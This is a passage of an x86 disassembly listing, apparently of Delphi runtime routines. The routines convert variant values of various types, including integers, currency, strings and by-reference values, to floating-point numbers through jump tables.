; ---------------------------------------------------------------------------
loc_4001041A: ; CODE XREF: sub_4001036C+15�j
; DATA XREF: sub_4001036C:off_40010388�o
fild dword ptr [ebx+8] ; jumptable 40010381 case 3
fstp [esp+18h+var_18]
wait
jmp loc_400106D8
; ---------------------------------------------------------------------------
loc_40010426: ; CODE XREF: sub_4001036C+15�j
; DATA XREF: sub_4001036C:off_40010388�o
fld dword ptr [ebx+8] ; jumptable 40010381 case 4
fstp [esp+18h+var_18]
wait
jmp loc_400106D8
; ---------------------------------------------------------------------------
loc_40010432: ; CODE XREF: sub_4001036C+15�j
; DATA XREF: sub_4001036C:off_40010388�o
mov eax, [ebx+8] ; jumptable 40010381 case 5
mov dword ptr [esp+18h+var_18], eax
mov eax, [ebx+0Ch]
mov dword ptr [esp+18h+var_18+4], eax
jmp loc_400106D8
; ---------------------------------------------------------------------------
loc_40010444: ; CODE XREF: sub_4001036C+15�j
; DATA XREF: sub_4001036C:off_40010388�o
fild qword ptr [ebx+8] ; jumptable 40010381 case 6
fdiv ds:flt_400106E0
fstp [esp+18h+var_18]
wait
jmp loc_400106D8
; ---------------------------------------------------------------------------
loc_40010456: ; CODE XREF: sub_4001036C+15�j
; DATA XREF: sub_4001036C:off_40010388�o
mov eax, [ebx+8] ; jumptable 40010381 case 7
mov dword ptr [esp+18h+var_18], eax
mov eax, [ebx+0Ch]
mov dword ptr [esp+18h+var_18+4], eax
jmp loc_400106D8
; ---------------------------------------------------------------------------
loc_40010468: ; CODE XREF: sub_4001036C+15�j
; DATA XREF: sub_4001036C:off_40010388�o
mov eax, ebx ; jumptable 40010381 case 8
call sub_400101AC
fstp [esp+18h+var_18]
wait
jmp loc_400106D8
; ---------------------------------------------------------------------------
loc_40010478: ; CODE XREF: sub_4001036C+15�j
; DATA XREF: sub_4001036C:off_40010388�o
movsx eax, word ptr [ebx+8] ; jumptable 40010381 case 11
mov [esp+18h+var_10], eax
fild [esp+18h+var_10]
fstp [esp+18h+var_18]
wait
jmp loc_400106D8
; ---------------------------------------------------------------------------
loc_4001048D: ; CODE XREF: sub_4001036C+15�j
; DATA XREF: sub_4001036C:off_40010388�o
movsx eax, byte ptr [ebx+8] ; jumptable 40010381 case 16
mov [esp+18h+var_10], eax
fild [esp+18h+var_10]
fstp [esp+18h+var_18]
wait
jmp loc_400106D8
; ---------------------------------------------------------------------------
loc_400104A2: ; CODE XREF: sub_4001036C+15�j
; DATA XREF: sub_4001036C:off_40010388�o
movzx eax, byte ptr [ebx+8] ; jumptable 40010381 case 17
mov [esp+18h+var_10], eax
fild [esp+18h+var_10]
fstp [esp+18h+var_18]
wait
jmp loc_400106D8
; ---------------------------------------------------------------------------
loc_400104B7: ; CODE XREF: sub_4001036C+15�j
; DATA XREF: sub_4001036C:off_40010388�o
movzx eax, word ptr [ebx+8] ; jumptable 40010381 case 18
mov [esp+18h+var_10], eax
fild [esp+18h+var_10]
fstp [esp+18h+var_18]
wait
jmp loc_400106D8
; ---------------------------------------------------------------------------
loc_400104CC: ; CODE XREF: sub_4001036C+15�j
; DATA XREF: sub_4001036C:off_40010388�o
mov eax, [ebx+8] ; jumptable 40010381 case 19
mov dword ptr [esp+18h+var_C], eax
xor eax, eax
mov dword ptr [esp+18h+var_C+4], eax
fild [esp+18h+var_C]
fstp [esp+18h+var_18]
wait
jmp loc_400106D8
; ---------------------------------------------------------------------------
loc_400104E6: ; CODE XREF: sub_4001036C+15�j
; DATA XREF: sub_4001036C:off_40010388�o
fild qword ptr [ebx+8] ; jumptable 40010381 case 20
fstp [esp+18h+var_18]
wait
jmp loc_400106D8
; ---------------------------------------------------------------------------
loc_400104F2: ; CODE XREF: sub_4001036C+15�j
; DATA XREF: sub_4001036C:off_40010388�o
mov eax, [ebx+8] ; jumptable 40010381 case 12
call sub_4001036C
fstp [esp+18h+var_18]
wait
jmp loc_400106D8
; ---------------------------------------------------------------------------
loc_40010503: ; CODE XREF: sub_4001036C+15�j
; DATA XREF: sub_4001036C:off_40010388�o
mov eax, ebx ; jumptable 40010381 cases 9,13
call sub_40010270
fstp [esp+18h+var_18]
wait
jmp loc_400106D8
; ---------------------------------------------------------------------------
loc_40010513: ; CODE XREF: sub_4001036C+F�j
; sub_4001036C+15�j
; DATA XREF: ...
mov edx, eax ; default
; jumptable 40010381 cases 10,14,15
sub dx, 100h
jz short loc_40010523
dec dx
jz short loc_40010533
jmp short loc_40010543
; ---------------------------------------------------------------------------
loc_40010523: ; CODE XREF: sub_4001036C+1AE�j
mov eax, ebx
call sub_400101AC
fstp [esp+18h+var_18]
wait
jmp loc_400106D8
; ---------------------------------------------------------------------------
loc_40010533: ; CODE XREF: sub_4001036C+1B3�j
mov eax, ebx
call sub_400102BC
fstp [esp+18h+var_18]
wait
jmp loc_400106D8
; ---------------------------------------------------------------------------
loc_40010543: ; CODE XREF: sub_4001036C+1B5�j
test ah, 40h
jz loc_400106C0
movzx eax, ax
and eax, 0FFFFBFFFh
cmp eax, 14h ; switch 21 cases
ja loc_400106B3 ; default
; jumptable 4001055D cases 0,1,9,10,13-15
jmp ds:off_40010564[eax*4] ; switch jump
; ---------------------------------------------------------------------------
off_40010564 dd offset loc_400106B3 ; DATA XREF: sub_4001036C+1F1�r
dd offset loc_400106B3 ; jump table for switch statement
dd offset loc_400105B8
dd offset loc_400105C6
dd offset loc_400105D4
dd offset loc_400105E2
dd offset loc_400105F6
dd offset loc_4001060A
dd offset loc_4001061E
dd offset loc_400106B3
dd offset loc_400106B3
dd offset loc_4001062E
dd offset loc_400106A5
dd offset loc_400106B3
dd offset loc_400106B3
dd offset loc_400106B3
dd offset loc_40010645
dd offset loc_40010659
dd offset loc_4001066D
dd offset loc_40010681
dd offset loc_4001069A
; ---------------------------------------------------------------------------
loc_400105B8: ; CODE XREF: sub_4001036C+1F1�j
; DATA XREF: sub_4001036C:off_40010564�o
mov eax, [ebx+8] ; jumptable 4001055D case 2
fild word ptr [eax]
fstp [esp+18h+var_18]
wait
jmp loc_400106D8
; ---------------------------------------------------------------------------
loc_400105C6: ; CODE XREF: sub_4001036C+1F1�j
; DATA XREF: sub_4001036C:off_40010564�o
mov eax, [ebx+8] ; jumptable 4001055D case 3
fild dword ptr [eax]
fstp [esp+18h+var_18]
wait
jmp loc_400106D8
; ---------------------------------------------------------------------------
loc_400105D4: ; CODE XREF: sub_4001036C+1F1�j
; DATA XREF: sub_4001036C:off_40010564�o
mov eax, [ebx+8] ; jumptable 4001055D case 4
fld dword ptr [eax]
fstp [esp+18h+var_18]
wait
jmp loc_400106D8
; ---------------------------------------------------------------------------
loc_400105E2: ; CODE XREF: sub_4001036C+1F1�j
; DATA XREF: sub_4001036C:off_40010564�o
mov eax, [ebx+8] ; jumptable 4001055D case 5
mov edx, [eax]
mov dword ptr [esp+18h+var_18], edx
mov edx, [eax+4]
mov dword ptr [esp+18h+var_18+4], edx
jmp loc_400106D8
; ---------------------------------------------------------------------------
loc_400105F6: ; CODE XREF: sub_4001036C+1F1�j
; DATA XREF: sub_4001036C:off_40010564�o
mov eax, [ebx+8] ; jumptable 4001055D case 6
fild qword ptr [eax]
fdiv ds:flt_400106E0
fstp [esp+18h+var_18]
wait
jmp loc_400106D8
; ---------------------------------------------------------------------------
loc_4001060A: ; CODE XREF: sub_4001036C+1F1�j
; DATA XREF: sub_4001036C:off_40010564�o
mov eax, [ebx+8] ; jumptable 4001055D case 7
mov edx, [eax]
mov dword ptr [esp+18h+var_18], edx
mov edx, [eax+4]
mov dword ptr [esp+18h+var_18+4], edx
jmp loc_400106D8
; ---------------------------------------------------------------------------
loc_4001061E: ; CODE XREF: sub_4001036C+1F1�j
; DATA XREF: sub_4001036C:off_40010564�o
mov eax, ebx ; jumptable 4001055D case 8
call sub_400101AC
fstp [esp+18h+var_18]
wait
jmp loc_400106D8
; ---------------------------------------------------------------------------
loc_4001062E: ; CODE XREF: sub_4001036C+1F1�j
; DATA XREF: sub_4001036C:off_40010564�o
mov eax, [ebx+8] ; jumptable 4001055D case 11
movsx eax, word ptr [eax]
mov [esp+18h+var_10], eax
fild [esp+18h+var_10]
fstp [esp+18h+var_18]
wait
jmp loc_400106D8
; ---------------------------------------------------------------------------
loc_40010645: ; CODE XREF: sub_4001036C+1F1�j
; DATA XREF: sub_4001036C:off_40010564�o
mov eax, [ebx+8] ; jumptable 4001055D case 16
movsx eax, byte ptr [eax]
mov [esp+18h+var_10], eax
fild [esp+18h+var_10]
fstp [esp+18h+var_18]
wait
jmp short loc_400106D8
; ---------------------------------------------------------------------------
loc_40010659: ; CODE XREF: sub_4001036C+1F1�j
; DATA XREF: sub_4001036C:off_40010564�o
mov eax, [ebx+8] ; jumptable 4001055D case 17
movzx eax, byte ptr [eax]
mov [esp+18h+var_10], eax
fild [esp+18h+var_10]
fstp [esp+18h+var_18]
wait
jmp short loc_400106D8
; ---------------------------------------------------------------------------
loc_4001066D: ; CODE XREF: sub_4001036C+1F1�j
; DATA XREF: sub_4001036C:off_40010564�o
mov eax, [ebx+8] ; jumptable 4001055D case 18
movzx eax, word ptr [eax]
mov [esp+18h+var_10], eax
fild [esp+18h+var_10]
fstp [esp+18h+var_18]
wait
jmp short loc_400106D8
; ---------------------------------------------------------------------------
loc_40010681: ; CODE XREF: sub_4001036C+1F1�j
; DATA XREF: sub_4001036C:off_40010564�o
mov eax, [ebx+8] ; jumptable 4001055D case 19
mov eax, [eax]
mov dword ptr [esp+18h+var_C], eax
xor eax, eax
mov dword ptr [esp+18h+var_C+4], eax
fild [esp+18h+var_C]
fstp [esp+18h+var_18]
wait
jmp short loc_400106D8
; ---------------------------------------------------------------------------
loc_4001069A: ; CODE XREF: sub_4001036C+1F1�j
; DATA XREF: sub_4001036C:off_40010564�o
mov eax, [ebx+8] ; jumptable 4001055D case 20
fild qword ptr [eax]
fstp [esp+18h+var_18]
wait
jmp short loc_400106D8
; ---------------------------------------------------------------------------
loc_400106A5: ; CODE XREF: sub_4001036C+1F1�j
; DATA XREF: sub_4001036C:off_40010564�o
mov eax, [ebx+8] ; jumptable 4001055D case 12
call sub_4001036C
fstp [esp+18h+var_18]
wait
jmp short loc_400106D8
; ---------------------------------------------------------------------------
loc_400106B3: ; CODE XREF: sub_4001036C+1EB�j
; sub_4001036C+1F1�j
; DATA XREF: ...
mov eax, ebx ; default
; jumptable 4001055D cases 0,1,9,10,13-15
call sub_40010270
fstp [esp+18h+var_18]
wait
jmp short loc_400106D8
; ---------------------------------------------------------------------------
loc_400106C0: ; CODE XREF: sub_4001036C+1DA�j
mov edx, esp
mov eax, ebx
call sub_40010320
test al, al
jnz short loc_400106D8
mov eax, ebx
call sub_40010270
fstp [esp+18h+var_18]
wait
loc_400106D8: ; CODE XREF: sub_4001036C+79�j
; sub_4001036C+9D�j ...
fld [esp+18h+var_18]
add esp, 14h
pop ebx
retn
sub_4001036C endp
; ---------------------------------------------------------------------------
flt_400106E0 dd 1.0e4 ; DATA XREF: sub_4001036C+DB�r
; sub_4001036C+28F�r
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_400106E4 proc near ; CODE XREF: sub_4000E9CC+FC�p
var_14 = qword ptr -14h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFECh
push ebx
push esi
push edi
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
movzx eax, word ptr [eax]
cmp eax, 14h ; switch 21 cases
ja loc_40010825 ; default
; jumptable 400106FF cases 5-10,12-15
jmp ds:off_40010706[eax*4] ; switch jump
; ---------------------------------------------------------------------------
off_40010706 dd offset loc_4001075A ; DATA XREF: sub_400106E4+1B�r
dd offset loc_40010764 ; jump table for switch statement
dd offset loc_40010784
dd offset loc_40010793
dd offset loc_400107A2
dd offset loc_40010825
dd offset loc_40010825
dd offset loc_40010825
dd offset loc_40010825
dd offset loc_40010825
dd offset loc_40010825
dd offset loc_400107B0
dd offset loc_40010825
dd offset loc_40010825
dd offset loc_40010825
dd offset loc_40010825
dd offset loc_400107C6
dd offset loc_400107DC
dd offset loc_400107EF
dd offset loc_40010802
dd offset loc_40010819
; ---------------------------------------------------------------------------
loc_4001075A: ; CODE XREF: sub_400106E4+1B�j
; DATA XREF: sub_400106E4:off_40010706�o
xor eax, eax ; jumptable 400106FF case 0
mov [ebp+var_8], eax
jmp loc_40010867
; ---------------------------------------------------------------------------
loc_40010764: ; CODE XREF: sub_400106E4+1B�j
; DATA XREF: sub_400106E4:off_40010706�o
cmp byte_4001AA10, 0 ; jumptable 400106FF case 1
jz short loc_4001077A
mov dx, 4
mov ax, 1
call sub_4000DBF4
loc_4001077A: ; CODE XREF: sub_400106E4+87�j
xor eax, eax
mov [ebp+var_8], eax
jmp loc_40010867
; ---------------------------------------------------------------------------
loc_40010784: ; CODE XREF: sub_400106E4+1B�j
; DATA XREF: sub_400106E4:off_40010706�o
mov eax, [ebp+var_4] ; jumptable 400106FF case 2
fild word ptr [eax+8]
fstp [ebp+var_8]
wait
jmp loc_40010867
; ---------------------------------------------------------------------------
loc_40010793: ; CODE XREF: sub_400106E4+1B�j
; DATA XREF: sub_400106E4:off_40010706�o
mov eax, [ebp+var_4] ; jumptable 400106FF case 3
fild dword ptr [eax+8]
fstp [ebp+var_8]
wait
jmp loc_40010867
; ---------------------------------------------------------------------------
loc_400107A2: ; CODE XREF: sub_400106E4+1B�j
; DATA XREF: sub_400106E4:off_40010706�o
mov eax, [ebp+var_4] ; jumptable 400106FF case 4
mov eax, [eax+8]
mov [ebp+var_8], eax
jmp loc_40010867
; ---------------------------------------------------------------------------
loc_400107B0: ; CODE XREF: sub_400106E4+1B�j
; DATA XREF: sub_400106E4:off_40010706�o
mov eax, [ebp+var_4] ; jumptable 400106FF case 11
movsx eax, word ptr [eax+8]
mov [ebp+var_C], eax
fild [ebp+var_C]
fstp [ebp+var_8]
wait
jmp loc_40010867
; ---------------------------------------------------------------------------
loc_400107C6: ; CODE XREF: sub_400106E4+1B�j
; DATA XREF: sub_400106E4:off_40010706�o
mov eax, [ebp+var_4] ; jumptable 400106FF case 16
movsx eax, byte ptr [eax+8]
mov [ebp+var_C], eax
fild [ebp+var_C]
fstp [ebp+var_8]
wait
jmp loc_40010867
; ---------------------------------------------------------------------------
loc_400107DC: ; CODE XREF: sub_400106E4+1B�j
; DATA XREF: sub_400106E4:off_40010706�o
mov eax, [ebp+var_4] ; jumptable 400106FF case 17
movzx eax, byte ptr [eax+8]
mov [ebp+var_C], eax
fild [ebp+var_C]
fstp [ebp+var_8]
wait
jmp short loc_40010867
; ---------------------------------------------------------------------------
loc_400107EF: ; CODE XREF: sub_400106E4+1B�j
; DATA XREF: sub_400106E4:off_40010706�o
mov eax, [ebp+var_4] ; jumptable 400106FF case 18
movzx eax, word ptr [eax+8]
mov [ebp+var_C], eax
fild [ebp+var_C]
fstp [ebp+var_8]
wait
jmp short loc_40010867
; ---------------------------------------------------------------------------
loc_40010802: ; CODE XREF: sub_400106E4+1B�j
; DATA XREF: sub_400106E4:off_40010706�o
mov eax, [ebp+var_4] ; jumptable 400106FF case 19
mov eax, [eax+8]
mov dword ptr [ebp+var_14], eax
xor eax, eax
mov dword ptr [ebp+var_14+4], eax
fild [ebp+var_14]
fstp [ebp+var_8]
wait
jmp short loc_40010867
; ---------------------------------------------------------------------------
loc_40010819: ; CODE XREF: sub_400106E4+1B�j
; DATA XREF: sub_400106E4:off_40010706�o
mov eax, [ebp+var_4] ; jumptable 400106FF case 20
fild qword ptr [eax+8]
fstp [ebp+var_8]
wait
jmp short loc_40010867
; ---------------------------------------------------------------------------
loc_40010825: ; CODE XREF: sub_400106E4+15�j
; sub_400106E4+1B�j
; DATA XREF: ...
xor eax, eax ; default
; jumptable 400106FF cases 5-10,12-15
push ebp
push offset loc_40010849
push dword ptr fs:[eax]
mov fs:[eax], esp
mov eax, [ebp+var_4]
call sub_4001036C
fstp [ebp+var_8]
wait
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
jmp short loc_40010867
; ---------------------------------------------------------------------------
loc_40010849: ; DATA XREF: sub_400106E4+144�o
jmp sub_400040D8
; ---------------------------------------------------------------------------
mov eax, [ebp+var_4]
movzx eax, word ptr [eax]
mov dx, 4
call sub_4000E068
xor eax, eax
mov [ebp+var_8], eax
call sub_40004360
loc_40010867: ; CODE XREF: sub_400106E4+7B�j
; sub_400106E4+9B�j ...
fld [ebp+var_8]
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_400106E4 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40010874 proc near ; CODE XREF: sub_40010ABC+DE�p
; sub_40010ABC+1A7�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = qword ptr -10h
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFE0h
push ebx
xor edx, edx
mov [ebp+var_20], edx
mov [ebp+var_1C], edx
mov [ebp+var_4], edx
mov ebx, eax
xor eax, eax
push ebp
push offset loc_40010950
push dword ptr fs:[eax]
mov fs:[eax], esp
mov edx, ebx
lea eax, [ebp+var_4]
call sub_40011DFC
lea eax, [ebp+var_10]
push eax
push 0
push 400h
mov eax, [ebp+var_4]
push eax
mov eax, off_4001AF3C
mov eax, [eax]
call eax
mov edx, eax
sub edx, 80020005h
jz short loc_400108CC
sub edx, 7FFDFFFBh
jnz short loc_40010921
jmp short loc_4001092D
; ---------------------------------------------------------------------------
loc_400108CC: ; CODE XREF: sub_40010874+4C�j
lea eax, [ebp+var_1C]
mov edx, [ebp+var_4]
call sub_40004B0C
mov eax, [ebp+var_1C]
lea edx, [ebp+var_10]
call sub_4000A710
test al, al
jnz short loc_4001092D
lea eax, [ebp+var_20]
mov edx, [ebp+var_4]
call sub_40004B0C
mov eax, [ebp+var_20]
lea edx, [ebp+var_18]
call sub_40008E90
test al, al
jz short loc_4001090E
mov eax, [ebp+var_18]
mov dword ptr [ebp+var_10], eax
mov eax, [ebp+var_14]
mov dword ptr [ebp+var_10+4], eax
jmp short loc_4001092D
; ---------------------------------------------------------------------------
loc_4001090E: ; CODE XREF: sub_40010874+8A�j
movzx edx, word ptr [ebx]
mov cx, 7
mov eax, 80020005h
call sub_4000E034
jmp short loc_4001092D
; ---------------------------------------------------------------------------
loc_40010921: ; CODE XREF: sub_40010874+54�j
movzx edx, word ptr [ebx]
mov cx, 7
call sub_4000E034
loc_4001092D: ; CODE XREF: sub_40010874+56�j
; sub_40010874+70�j ...
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40010957
loc_4001093A: ; CODE XREF: sub_40010874+E1�j
lea eax, [ebp+var_20]
mov edx, 2
call sub_400048A8
lea eax, [ebp+var_4]
call sub_40005008
retn
; ---------------------------------------------------------------------------
loc_40010950: ; DATA XREF: sub_40010874+17�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_4001093A
; ---------------------------------------------------------------------------
loc_40010957: ; CODE XREF: sub_40010874+DB�j
; DATA XREF: sub_40010874+C1�o
fld [ebp+var_10]
pop ebx
mov esp, ebp
pop ebp
retn
sub_40010874 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40010960 proc near ; CODE XREF: sub_40010ABC+166�p
; sub_40010ABC+307�p
var_18 = word ptr -18h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = qword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
add esp, 0FFFFFFE8h
push ebx
mov ebx, eax
lea eax, [ebp+var_18]
push eax
call sub_4000CDD8
mov [ebp+var_18], 5
mov eax, [ebp+arg_0]
mov [ebp+var_10], eax
mov eax, [ebp+arg_4]
mov [ebp+var_C], eax
push 7
push 0
push 400h
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_18]
push eax
mov eax, off_4001B064
mov eax, [eax]
call eax
movzx edx, word ptr [ebx]
mov cx, 7
call sub_4000E034
mov eax, [ebp+var_10]
mov dword ptr [ebp+var_8], eax
mov eax, [ebp+var_C]
mov dword ptr [ebp+var_8+4], eax
fld [ebp+var_8]
pop ebx
mov esp, ebp
pop ebp
retn 8
sub_40010960 endp
; =============== S U B R O U T I N E =======================================
sub_400109C0 proc near ; CODE XREF: sub_40010ABC+BC�p
; sub_40010ABC+187�p ...
var_1C = qword ptr -1Ch
var_14 = byte ptr -14h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
push ebx
add esp, 0FFFFFFE8h
mov ebx, eax
lea eax, [esp+1Ch+var_14]
push eax
call sub_4000CDD8
push 7
push 0
push 400h
push ebx
lea eax, [esp+2Ch+var_14]
push eax
mov eax, off_4001B064
mov eax, [eax]
call eax
movzx edx, word ptr [ebx]
mov cx, 7
call sub_4000E034
mov eax, [esp+1Ch+var_C]
mov dword ptr [esp+1Ch+var_1C], eax
mov eax, [esp+1Ch+var_8]
mov dword ptr [esp+1Ch+var_1C+4], eax
fld [esp+1Ch+var_1C]
add esp, 18h
pop ebx
retn
sub_400109C0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40010A0C proc near ; CODE XREF: sub_40010ABC+1B7�p
var_18 = byte ptr -18h
var_8 = qword ptr -8
push ebp
mov ebp, esp
add esp, 0FFFFFFE8h
push ebx
mov ebx, eax
lea eax, [ebp+var_18]
push eax
call sub_4000CDD8
xor eax, eax
push ebp
push offset loc_40010A61
push dword ptr fs:[eax]
mov fs:[eax], esp
mov edx, ebx
lea eax, [ebp+var_18]
call sub_4000E700
lea eax, [ebp+var_18]
call ds:off_4001F29C
lea eax, [ebp+var_18]
call sub_40010ABC
fstp [ebp+var_8]
wait
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_40010A68
loc_40010A58: ; CODE XREF: sub_40010A0C+5A�j
lea eax, [ebp+var_18]
call sub_4000E3D8
retn
; ---------------------------------------------------------------------------
loc_40010A61: ; DATA XREF: sub_40010A0C+15�o
jmp loc_40004204
; ---------------------------------------------------------------------------
jmp short loc_40010A58
; ---------------------------------------------------------------------------
loc_40010A68: ; CODE XREF: sub_40010A0C+54�j
; DATA XREF: sub_40010A0C+47�o
fld [ebp+var_8]
pop ebx
mov esp, ebp
pop ebp
retn
sub_40010A0C endp
; =============== S U B R O U T I N E =======================================
sub_40010A70 proc near ; CODE XREF: sub_40010ABC+331�p
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
push ebx
push esi
push edi
add esp, 0FFFFFFECh
mov edi, edx
mov esi, eax
mov edx, esp
movzx eax, word ptr [esi]
call sub_40012D98
mov ebx, eax
test bl, bl
jz short loc_40010AB2
lea eax, [esp+20h+var_1C]
push eax
call sub_4000CDD8
push 7
mov ecx, esi
lea edx, [esp+24h+var_1C]
mov eax, [esp+24h+var_20]
mov esi, [eax]
call dword ptr [esi+1Ch]
mov eax, [esp+20h+var_14]
mov [edi], eax
mov eax, [esp+20h+var_10]
mov [edi+4], eax
loc_40010AB2: ; CODE XREF: sub_40010A70+18�j
mov eax, ebx
add esp, 14h
pop edi
pop esi
pop ebx
retn
sub_40010A70 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40010ABC proc near ; CODE XREF: sub_4000E9CC+14A�p
; sub_40010A0C+36�p ...
var_20 = qword ptr -20h
var_18 = qword ptr -18h
var_10 = dword ptr -10h
var_C = qword ptr -0Ch
push ebx
add esp, 0FFFFFFECh
mov ebx, eax
movzx eax, word ptr [ebx]
movzx edx, ax
cmp edx, 14h ; switch 21 cases
ja loc_40010C51 ; default
; jumptable 40010AD1 cases 10,14,15
jmp ds:off_40010AD8[edx*4] ; switch jump
; ---------------------------------------------------------------------------
off_40010AD8 dd offset loc_40010B2C ; DATA XREF: sub_40010ABC+15�r
dd offset loc_40010B3A ; jump table for switch statement
dd offset loc_40010B5E
dd offset loc_40010B6A
dd offset loc_40010B76
dd offset loc_40010B76
dd offset loc_40010B76
dd offset loc_40010B86
dd offset loc_40010B98
dd offset loc_40010C41
dd offset loc_40010C51
dd offset loc_40010BA8
dd offset loc_40010C30
dd offset loc_40010C41
dd offset loc_40010C51
dd offset loc_40010C51
dd offset loc_40010BBD
dd offset loc_40010BD2
dd offset loc_40010BE7
dd offset loc_40010BFC
dd offset loc_40010C16
; ---------------------------------------------------------------------------
loc_40010B2C: ; CODE XREF: sub_40010ABC+15�j
; DATA XREF: sub_40010ABC:off_40010AD8�o
xor eax, eax ; jumptable 40010AD1 case 0
mov dword ptr [esp+18h+var_18], eax
mov dword ptr [esp+18h+var_18+4], eax
jmp loc_40010E01
; ---------------------------------------------------------------------------
loc_40010B3A: ; CODE XREF: sub_40010ABC+15�j
; DATA XREF: sub_40010ABC:off_40010AD8�o
cmp byte_4001AA10, 0 ; jumptable 40010AD1 case 1
jz short loc_40010B50
mov dx, 7
mov ax, 1
call sub_4000DBF4
loc_40010B50: ; CODE XREF: sub_40010ABC+85�j
xor eax, eax
mov dword ptr [esp+18h+var_18], eax
mov dword ptr [esp+18h+var_18+4], eax
jmp loc_40010E01
; ---------------------------------------------------------------------------
loc_40010B5E: ; CODE XREF: sub_40010ABC+15�j
; DATA XREF: sub_40010ABC:off_40010AD8�o
fild word ptr [ebx+8] ; jumptable 40010AD1 case 2
fstp [esp+18h+var_18]
wait
jmp loc_40010E01
; ---------------------------------------------------------------------------
loc_40010B6A: ; CODE XREF: sub_40010ABC+15�j
; DATA XREF: sub_40010ABC:off_40010AD8�o
fild dword ptr [ebx+8] ; jumptable 40010AD1 case 3
fstp [esp+18h+var_18]
wait
jmp loc_40010E01
; ---------------------------------------------------------------------------
loc_40010B76: ; CODE XREF: sub_40010ABC+15�j
; DATA XREF: sub_40010ABC:off_40010AD8�o
mov eax, ebx ; jumptable 40010AD1 cases 4-6
call sub_400109C0
fstp [esp+18h+var_18]
wait
jmp loc_40010E01
; ---------------------------------------------------------------------------
loc_40010B86: ; CODE XREF: sub_40010ABC+15�j
; DATA XREF: sub_40010ABC:off_40010AD8�o
mov eax, [ebx+8] ; jumptable 40010AD1 case 7
mov dword ptr [esp+18h+var_18], eax
mov eax, [ebx+0Ch]
mov dword ptr [esp+18h+var_18+4], eax
jmp loc_40010E01
; ---------------------------------------------------------------------------
loc_40010B98: ; CODE XREF: sub_40010ABC+15�j
; DATA XREF: sub_40010ABC:off_40010AD8�o
mov eax, ebx ; jumptable 40010AD1 case 8
call sub_40010874
fstp [esp+18h+var_18]
wait
jmp loc_40010E01
; ---------------------------------------------------------------------------
loc_40010BA8: ; CODE XREF: sub_40010ABC+15�j
; DATA XREF: sub_40010ABC:off_40010AD8�o
movsx eax, word ptr [ebx+8] ; jumptable 40010AD1 case 11
mov [esp+18h+var_10], eax
fild [esp+18h+var_10]
fstp [esp+18h+var_18]
wait
jmp loc_40010E01
; ---------------------------------------------------------------------------
loc_40010BBD: ; CODE XREF: sub_40010ABC+15�j
; DATA XREF: sub_40010ABC:off_40010AD8�o
movsx eax, byte ptr [ebx+8] ; jumptable 40010AD1 case 16
mov [esp+18h+var_10], eax
fild [esp+18h+var_10]
fstp [esp+18h+var_18]
wait
jmp loc_40010E01
; ---------------------------------------------------------------------------
loc_40010BD2: ; CODE XREF: sub_40010ABC+15�j
; DATA XREF: sub_40010ABC:off_40010AD8�o
movzx eax, byte ptr [ebx+8] ; jumptable 40010AD1 case 17
mov [esp+18h+var_10], eax
fild [esp+18h+var_10]
fstp [esp+18h+var_18]
wait
jmp loc_40010E01
; ---------------------------------------------------------------------------
loc_40010BE7: ; CODE XREF: sub_40010ABC+15�j
; DATA XREF: sub_40010ABC:off_40010AD8�o
movzx eax, word ptr [ebx+8] ; jumptable 40010AD1 case 18
mov [esp+18h+var_10], eax
fild [esp+18h+var_10]
fstp [esp+18h+var_18]
wait
jmp loc_40010E01
; ---------------------------------------------------------------------------
loc_40010BFC: ; CODE XREF: sub_40010ABC+15�j
; DATA XREF: sub_40010ABC:off_40010AD8�o
mov eax, [ebx+8] ; jumptable 40010AD1 case 19
mov dword ptr [esp+18h+var_C], eax
xor eax, eax
mov dword ptr [esp+18h+var_C+4], eax
fild [esp+18h+var_C]
fstp [esp+18h+var_18]
wait
jmp loc_40010E01
; ---------------------------------------------------------------------------
loc_40010C16: ; CODE XREF: sub_40010ABC+15�j
; DATA XREF: sub_40010ABC:off_40010AD8�o
fild qword ptr [ebx+8] ; jumptable 40010AD1 case 20
add esp, 0FFFFFFF8h
fstp [esp+20h+var_20]
wait
mov eax, ebx
call sub_40010960
fstp [esp+18h+var_18]
wait
jmp loc_40010E01
; ---------------------------------------------------------------------------
loc_40010C30: ; CODE XREF: sub_40010ABC+15�j
; DATA XREF: sub_40010ABC:off_40010AD8�o
mov eax, [ebx+8] ; jumptable 40010AD1 case 12
call sub_40010ABC
fstp [esp+18h+var_18]
wait
jmp loc_40010E01
; ---------------------------------------------------------------------------
loc_40010C41: ; CODE XREF: sub_40010ABC+15�j
; DATA XREF: sub_40010ABC:off_40010AD8�o
mov eax, ebx ; jumptable 40010AD1 cases 9,13
call sub_400109C0
fstp [esp+18h+var_18]
wait
jmp loc_40010E01
; ---------------------------------------------------------------------------
loc_40010C51: ; CODE XREF: sub_40010ABC+F�j
; sub_40010ABC+15�j
; DATA XREF: ...
mov edx, eax ; default
; jumptable 40010AD1 cases 10,14,15
sub dx, 100h
jz short loc_40010C61
dec dx
jz short loc_40010C71
jmp short loc_40010C81
; ---------------------------------------------------------------------------
